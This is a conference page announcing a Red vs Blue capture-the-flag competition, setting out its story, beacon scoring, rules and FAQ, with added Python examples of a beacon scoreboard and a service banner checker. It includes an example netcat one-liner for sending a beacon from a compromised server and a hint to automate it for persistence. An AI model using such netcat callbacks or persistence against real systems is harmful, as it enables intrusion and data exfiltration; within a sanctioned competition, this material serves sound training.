Red vs Blue CTF

Alongside our regular jeopardy CTF, this year we're also going to be running a RedvBlue style CTF. For more info...keep reading.

Story

You have been hired by CrapCorp international to defend their network. Their old sysadmin, known as ShittySysAdmin, quit last week after people made fun of his DNS skills. The company thought he did a good job, but...they suspect the network might be insecure.

It's your job to enumerate the network, find and fix the vulnerabilities, and detect and kick out any attackers.

Information

WTF is this?

RedVBlue CTF is a competition between several teams, who are all provided with the same set of vulnerable servers, and need to defend them from attacks by the other teams...and...attack the other teams' servers.

There is a "scoreboard" which monitors some services on each team's network. If everything is good and working fine, your team's score will go up. If services or servers are inaccessible, your team's score will stop going up.

When the game starts, each team will only be able to access its own servers' network. From there, you will have TBC amount of time to enumerate your servers, log in, find and fix the vulnerabilities, reset passwords etc. But also...LEARN how you could attack these servers, as you will be doing exactly that. After TBC amount of time has elapsed, the firewall rules will be opened up, and all teams will be able to access all other teams' servers too.

Examples of what attackers could/should do to "mess" with a server are:
- Stop the service
- Stop the server (Shutdown)
- Modify a server's config file so it does not start correctly (Don't blitz the entire config file, just maybe modify the first line to read "hacked by Blue Team 2". Basically something that will stop the service loading, but that the defending team can easily find and fix)

Examples of what attackers should NOT do can be found in the rules, but basically: no destructive actions. Yeah yeah, you could delete the apache binary, or rm -rf the box. Please don't.

The team with the highest score at the end of the game wins! So keep your servers up and their services running and you'll do well.

BUT! There's a way to reduce a team's score. "Beacons"!

What's a "beacon" you may ask? A beacon is basically a unique string which someone sends from a compromised server back to the scoreboard. Each team will have their own set of unique strings. Once the scoreboard receives a string, it will work out whose string it is (e.g. Blue Team 1) and where it's coming from (e.g. Blue Team 4). It will then put an icon on the scoreboard against the compromised team (e.g. Blue Team 4), in the colour of the team whose string it matches (e.g. Blue Team 1).

Basically, it's a way for an attacker on a compromised server to say "Hey....I'm here! Come find me!" But if your team has a "beacon" on one of your compromised hosts, your team will start LOSING points. You also won't be told which server the beacon is coming from; you have to find where it's coming from, kill it, find the attacker who launched it, and block them from getting back in.

An example of how to launch a beacon might be **echo "hi-dook-woz-ere" | nc 10.10.10.10 51000**. Once a beacon is launched and detected by the scoreboard, it will be valid for 5 mins, then it will disappear from the scoreboard. So the attacker must run it again, or.....find a way to have it sent automatically every 5 mins, and...move on and pop another box.
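To make the beacon mechanic concrete, here is a toy model of both ends of it in Python. This is an added example written for this page, not the organisers' scoreboard code. The wire format (a string over a TCP connection, as in the nc one-liner above) and the 5 minute expiry come from the page; the team subnets (still TBC above), every beacon string other than the page's own example, the one-point-per-beacon penalty and the clock() helper are placeholders assumed for the demo.

```python
"""Toy model of the RedVBlue beacon mechanism: the nc one-liner on the attacker
side, and the string/subnet matching plus 5 minute expiry on the scoreboard side.
Added example for this page, not the organisers' scoreboard code."""
import ipaddress
import socket
import threading
from datetime import datetime, timedelta

# ASSUMPTION: the team subnets are TBC on the page; these are placeholders only.
TEAM_SUBNETS = {
    "Blue Team 1": ipaddress.ip_network("10.0.1.0/24"),
    "Blue Team 2": ipaddress.ip_network("10.0.2.0/24"),
    "Blue Team 3": ipaddress.ip_network("10.0.3.0/24"),
    "Blue Team 4": ipaddress.ip_network("10.0.4.0/24"),
}
# ASSUMPTION: one unique string per team; only the first is the page's own example.
TEAM_BEACONS = {
    "hi-dook-woz-ere": "Blue Team 1",
    "bt2-woz-ere": "Blue Team 2",
    "bt3-woz-ere": "Blue Team 3",
    "bt4-woz-ere": "Blue Team 4",
}
BEACON_TTL = timedelta(minutes=5)  # from the page: a beacon stays valid for 5 mins
EPOCH = datetime(2020, 1, 1, 12, 0, 0)  # fixed clock so the demo is deterministic


def clock(minutes: float) -> datetime:
    """Helper for the demo: a timestamp `minutes` after the fixed EPOCH."""
    return EPOCH + timedelta(minutes=minutes)


def team_for_ip(ip: str):
    """Which team's network a beacon came from, or None if it is out of scope."""
    addr = ipaddress.ip_address(ip)
    for team, net in TEAM_SUBNETS.items():
        if addr in net:
            return team
    return None


class BeaconBoard:
    """Scoreboard state: (attacker, victim) -> time the icon expires."""

    def __init__(self):
        self.active = {}

    def receive(self, payload: str, src_ip: str, now: datetime):
        token = payload.strip()
        attacker = TEAM_BEACONS.get(token)
        victim = team_for_ip(src_ip)
        # Unknown string, out-of-scope source, or a team beaconing its own box: ignored.
        if attacker is None or victim is None or attacker == victim:
            return None
        self.active[(attacker, victim)] = now + BEACON_TTL  # re-sending refreshes the 5 mins
        return attacker, victim

    def markers(self, now: datetime):
        """Icons currently shown: victim -> set of attacker colours. Expired ones drop off."""
        self.active = {k: exp for k, exp in self.active.items() if exp > now}
        icons = {}
        for attacker, victim in self.active:
            icons.setdefault(victim, set()).add(attacker)
        return icons

    def penalty(self, team: str, now: datetime, points_per_beacon: int = 1):
        """Points a team loses this scoring tick (ASSUMPTION: one point per live beacon)."""
        return points_per_beacon * len(self.markers(now).get(team, ()))


def send_beacon(host: str, port: int, token: str):
    """What `echo "hi-dook-woz-ere" | nc 10.10.10.10 51000` does on the wire."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall((token + "\n").encode())


def listen_once(sock: socket.socket):
    """Accept one beacon connection; return (payload, source_ip) as the scoreboard sees it."""
    conn, (src_ip, _port) = sock.accept()
    with conn:
        data = conn.recv(256).decode(errors="replace")
    return data.strip(), src_ip


def loopback_roundtrip(token: str):
    """Run listener and sender on 127.0.0.1 to show the exchange end to end."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    result = {}
    t = threading.Thread(target=lambda: result.update(zip(("payload", "src_ip"), listen_once(srv))))
    t.start()
    send_beacon("127.0.0.1", srv.getsockname()[1], token)
    t.join(5)
    srv.close()
    return result["payload"], result["src_ip"]


if __name__ == "__main__":
    board = BeaconBoard()
    # Blue Team 1's string arriving from a Blue Team 4 box: icon goes against Team 4.
    print(board.receive("hi-dook-woz-ere", "10.0.4.20", clock(0)))
    print(board.markers(clock(4)))  # still shown
    print(board.markers(clock(6)))  # gone unless it was re-sent
    print(loopback_roundtrip("hi-dook-woz-ere"))
```

The loopback round trip only proves the transport: 127.0.0.1 is not inside any team subnet, so the board would ignore it, which is exactly the out-of-scope check a real scoreboard needs. The defender's job is the reverse of receive(): find the process, cron job or timer on your box that keeps opening a connection to the scoreboard port every few minutes, kill it, and work out how the attacker got in.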

Additional Info

The scoreboard will display the name of the server being monitored, along with the port numbers being monitored too. If it's Green...Good job! If it's Red...Ummm bad!

The game will start with TBC number of vulnerable servers for each team...this doesn't mean these will be the only servers you have to protect/attack. The admin team will add additional servers, whenever they like.

The admin team may also add additional services to be monitored, or change them...just depends how we're feeling TBH 😂

The admin team WILL be monitoring servers & services separately from the scoreboard. If we see something that's not right, we'll have a word with the team to fix it, otherwise we'll start docking points. An example of this might be a server running a WordPress site: if the Blue Team simply removes the WordPress site but keeps the web server running (e.g. port 80), that's not the point. Keep the installed services running, otherwise...docked points!

This page will be updated with new FAQ etc, and info regularly.

Game Rules

No attacking out of scope systems, this includes the scoreboard, ESX infrastructure, networking, CTF admin team or other players. Only attack systems in the following subnets.
- TBC (Blue Team 1)
- TBC (Blue Team 2)
- TBC (Blue Team 3)
- TBC (Blue Team 4)

No DOS attacks. Yes, we know these can make servers inaccessible so they can't be scored, but that's not the point; performing a DOS isn't cool. Just don't do it, please.

NO USE OF HOST BASED FIREWALLS! - I know, this is the best way to stop people attacking your systems, but this isn't the point of the game. The admin team will have some monitoring which allows us to see if host based firewalls are enabled. When we talk about host based firewalls, we mean Windows Firewall, Linux firewalls (iptables etc).

No "destructive" actions (unless the admin team say otherwise). By this I mean: no rm -rf on a box, no deleting binaries or modifying them so they can't run, and no deletion of existing user accounts.

Player Requirements

You'll need to have a ticket to the con.

We hope that players will be able to dedicate most of their time to taking part in the CTF. Obviously we won't be stopping you doing whatever you want; you bought a ticket for the con, and we don't want you missing out on talks, etc. But if you can only play for an hour, then...maybe don't apply.

You'll need to bring a laptop to play on. It doesn't matter what OS you run, but if you're not sure, we'd recommend having Kali on it, be it as a VM or on the host.

Connection into the RedVBlue CTF networks is via ethernet (cable). There will be NO wireless connection to the CTF. Why not? Because this stops a team having heaps of extra people playing and making the teams uneven.

FAQ

Where did the idea for this CTF come from?

dook has been lucky enough to take part in the ProsVJoes CTF, which runs at some conferences in the US (mainly BSidesLV). The one being run at CrikeyCon is like ProsVJoes, but...without the steroids! ProsVJoes has heaps more servers, a dedicated Red Team attacking all the Blue Teams, and active users in the environment who lodge "Help Desk" tickets for the Blue Teams to complete, or call you on a VOIP phone on your desk. It's an amazing CTF, and if you ever get the chance, I highly recommend you take part.

What are the prizes for winning the CTF?

We may do trophies, just for the lolz, but aside from that, you win bragging rights of kicking other teams butts.

What happens if someone DOES do a destructive act to a server?

We hope this won't happen, but if it does, we will liaise with the affected Blue Team, revert the server to a snapshot, and allow only them access to it while they re-defend it. If we can determine which attacking team did it, we WILL dock points. Just please don't; it's not the idea of this CTF.

You keep mentioning "it's not the idea of this CTF", so...what is the idea?

Enumerate your boxes to discover the vulnerabilities, fix them, detect and kick out attackers, and attack fellow teams.

How many teams/players will there be?

There will be a limit on the number of teams and players. Hopefully we'll have 4 teams, with 8 players in each team.

If we have a vulnerable service running, such as an FTP server, can we just shut that down and run a DIFFERENT FTP server program? Or, if we have a vulnerable web app, can we just disable that web app and keep the web server running?

No. Otherwise everyone would do this. The scoreboard you'll see during the CTF isn't that good at actually monitoring the content of services. So the admins have a 2nd scoreboard running in the background that monitors services for "content", such as: do we see this banner on the FTP server? Do we see this vulnerable web app on port 80? If that starts seeing services offline, we will start manually docking points.

The idea is to fix your current vulnerable services so they stay the same, but....not vulnerable.
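The difference between the two scoreboards is easy to see in code: the public one is happy if a TCP connect succeeds, the admins' one also wants to see the expected content. Below is an added example of a content-aware probe, written for this page rather than taken from the organisers' tooling. The CrapCorp banner text, the swapped-in daemon's banner and the in-process stand-in server are constructed for the demo; the real checks would look for whatever banner or page marker each vulnerable service actually shows.

```python
"""Content-aware service check: the difference between "port 21 answers" (public
scoreboard) and "it is still the FTP server we deployed" (admins' second check).
Added example for this page, not the organisers' checker."""
import socket
import threading

OK, CHANGED, DOWN = "ok", "up-but-changed", "down"


def probe_banner(host: str, port: int, expected: str, timeout: float = 3.0):
    """Connect, read the first banner line, and classify the service.

    Returns (state, banner): DOWN if nothing accepts the connection, CHANGED if
    something listens but the expected text is missing, OK if the banner matches.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(512).decode(errors="replace")
            except socket.timeout:
                banner = ""  # listener accepted but never spoke: a blank nc -l, for example
    except OSError:
        return DOWN, ""
    return (OK if expected in banner else CHANGED), banner.strip()


def serve_banner(banner: str):
    """Stand-in for the monitored service (constructed for the demo): send one banner
    per connection on an ephemeral loopback port. Returns (port, stop_function)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)  # so the accept loop can notice the stop flag
    stop_flag = threading.Event()

    def loop():
        while not stop_flag.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                if banner:
                    conn.sendall(banner.encode())

    t = threading.Thread(target=loop, daemon=True)
    t.start()

    def stop():
        stop_flag.set()
        t.join()
        srv.close()

    return srv.getsockname()[1], stop


def demo():
    """Four defender choices as the admins' check would see them."""
    expected = "220 CrapCorp FTP"  # constructed marker the second scoreboard looks for
    results = {}

    # 1. Original service left in place (patched or not): still shows its banner.
    port, stop = serve_banner("220 CrapCorp FTP ready\r\n")
    results["original"] = probe_banner("127.0.0.1", port, expected)[0]
    stop()

    # 2. Team swapped in a different FTP daemon: public board green, admins see CHANGED.
    port, stop = serve_banner("220 some-other-ftpd\r\n")
    results["swapped"] = probe_banner("127.0.0.1", port, expected)[0]
    stop()

    # 3. Port kept open with nothing behind it: also CHANGED.
    port, stop = serve_banner("")
    results["blank"] = probe_banner("127.0.0.1", port, expected)[0]
    stop()

    # 4. Service stopped entirely: the port just closed, so the probe reports DOWN.
    results["down"] = probe_banner("127.0.0.1", port, expected)[0]
    return results


if __name__ == "__main__":
    for case, state in demo().items():
        print(f"{case:9s} -> {state}")
```

Only case 1 keeps both scoreboards green. The same idea applies to the web app case: an HTTP check that fetches a page and looks for a marker string from the vulnerable app would report CHANGED for a bare "It works!" default page on port 80, even though a port check alone would be green.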


Still interested? Register your interest below:

RedvBlue Registration Form